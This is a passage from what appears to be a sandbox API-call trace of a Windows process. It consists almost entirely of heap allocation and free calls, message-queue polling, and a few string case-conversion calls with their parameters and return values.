hHeap=0x25c0000) returned 1 [0204.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0204.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0204.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.436] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0204.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.437] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0204.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0204.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0204.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0204.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0204.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0204.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0204.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0204.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0204.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0204.441] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0204.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0204.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.442] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.442] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0204.442] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0204.443] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0204.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0204.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0204.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0204.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0204.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0204.446] RtlAllocateHeap 